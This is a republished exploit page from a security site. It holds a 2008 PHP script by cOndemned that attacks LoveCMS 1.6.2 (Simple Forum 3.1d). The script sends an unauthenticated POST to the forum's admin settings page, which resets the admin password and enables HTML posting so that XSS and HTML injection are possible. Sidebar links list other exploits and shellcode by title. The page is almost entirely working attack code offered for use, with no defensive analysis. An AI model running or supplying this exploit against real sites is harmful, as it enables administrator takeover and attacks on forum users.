首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit
来源:www.vfcocus.net 作者:cOndemned 发布时间:2008-11-24  
<?php

/**
* LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit
* Vulnerability found & exploited by cOndemned
*
* Download:
* http://www.thethinkingman.net/modules/download_manager/?id=4
*
* Description:
* This exploit changes forum admin password (ex. attacker will be
* able to delete threads/topics) and sets allowHTML to true
* (attacks such as XSS/HTML Injection will be possible)
*
*/

$target = 'localhost/audits/lovecms';
$pass = 'timetodie';
$buff = array
(
'language' => 'en',
'forumWidth' => '500',
'forumAlign' => 'left',
'forumTitle' => 'Simple Forum',
'threadsPerPage' => '15',
'wordLength' => '50',
'autoDelete' => '12',
'adminPass' => $pass,
'allowHTML' => '1',
'allowURLs' => '1',
'allowUBBs' => '1',
'enableIDs' => '0',
'enableSignature' => '1',
'enableRefererCheck' => '0',
'enableAgentCheck' => '0',
'agents' => 'Mozilla.Opera.Lynx.Mosaic.amaya.WebExplorer.IBrowse.iCab',
'nonos' => 'fuck.asshole',
'update' => 'Update'
);

$xpl = curl_init();

curl_setopt($xpl, CURLOPT_URL, $target . '/modules/simpleforum/admin/index.php');
curl_setopt($xpl, CURLOPT_POST, 1);
curl_setopt($xpl, CURLOPT_POSTFIELDS, $buff);

curl_exec($xpl);
curl_close($xpl);

echo "[!] Go to the website and check if U can login.\r\n";
?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·linux/x86 setuid(0) & execve(/
·linux/x86 execve(/bin/sh,0,0)
·Microsoft XML Core Services DT
·linux/x86 connect-back port UD
·Discuz! Reset User Password Vu
·linux/x86 append rsa key to /r
·Oracle Database Vault ptrace(
·KVIrc 3.4.2 Shiny (uri handler
·vBulletin 3.7.3 Visitor Messag
·PHP-Fusion 7.00.1 (messages.ph
·Nero ShowTime 5.0.15.0 m3u Pla
·wPortfolio <= 0.3 Admin Passwo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved